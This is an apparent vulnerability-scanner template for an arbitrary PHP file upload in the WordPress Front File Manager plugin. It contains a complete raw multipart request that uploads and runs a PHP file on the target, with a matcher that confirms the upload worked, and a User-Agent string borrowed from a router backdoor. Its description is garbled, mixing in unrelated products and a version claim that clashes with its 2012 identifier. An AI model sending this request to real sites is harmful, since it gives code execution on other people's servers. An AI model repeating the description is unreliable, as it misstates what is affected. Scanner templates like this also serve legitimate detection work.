id: CNVD-2012-8656
info:
  name: WordPress Front File Manager Plugin 0.1 - Arbitrary File Upload
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Front File Manager ‘Upload.php’ Arbitrary Code Execution Vulnerability
    WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. Ghost is a plugin used to import/export WordPress data. Relevant is a related content display plug-in used in it. File Upload is a file upload plug-in used in it. PHP is a jointly maintained open source, general-purpose computer scripting language. This language is mainly used for web development and supports a variety of databases and operating systems. elFinder is an open source AJAX file manager based on the Drupal platform. This product provides functions such as multi-file upload and image scaling.

    There is a security vulnerability in WordPress versions before 6.9. The vulnerability in the file manager (wp-file-manager) plugin allows remote attackers to upload and execute arbitrary PHP code. An attacker could exploit this vulnerability to execute arbitrary code.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: http://www.wordpress.org/

    Temporary fix:
    File upload:
    1. The server side directly sets the file upload directory to non-executable.
    2. File type check: It is recommended to use the whitelist method (more reliable than the blacklist), combined with MIME Type, suffix check and other methods (the file type is restricted by the whitelist). In addition, you can use the compression function or resize function to process images, which will destroy the HTML code they contain while processing the image.
    3. Use random numbers to rewrite file names and file paths so that users cannot easily access their uploaded files.
    4. Set the domain name of the file server separately.
    5. Verify the file content and use regular rules to match malicious code (filter various bypass methods of malicious code, such as upper and lower case, BASE64 encoding) to limit uploading.
    6. Fix possible parsing vulnerabilities in the server.
    7. Strictly restrict the upload of files that can modify the server configuration, such as: .htaccess.
    8. Hide the upload file path.
    9. Upgrade Web Server.
    10. Fix the Web upload code in a timely manner.
    11. There cannot be any local files containing vulnerabilities.
    12. Pay attention to 0x00 truncation attack (update PHP to the latest version).
requests:
- raw:
  - |
    POST /wordpress/wp-content/plugins/front-file-manager/upload.php?name=1.php&chunks=2&chunk=1 HTTP/1.1
    Host: {{Host}}

    User-Agent: xmlset_roodkcableoj28840ybtide
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    x-forwarded-for: 10.0.0.1
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=---------------------------6698540723381
    Content-Length: 340

    -----------------------------6698540723381
    Content-Disposition: form-data; name="file"; filename="test.php"
    Content-Type: application/octet-stream

    <?php echo md5(233);unlink(__FILE__);?>
    -----------------------------6698540723381
    Content-Disposition: form-data; name="upload"


    -----------------------------6698540723381--
- matchers:
  - type: status
    status:
    - 200
  - type: word
    words:
    - e165421110ba03099a1c0393373c5b43
  matchers-condition: and
  path:
  - '{{BaseURL}}/wordpress/wp-content/plugins/front-file-manager/FFM_DESTINATION_DIR/1.php'
  method: GET
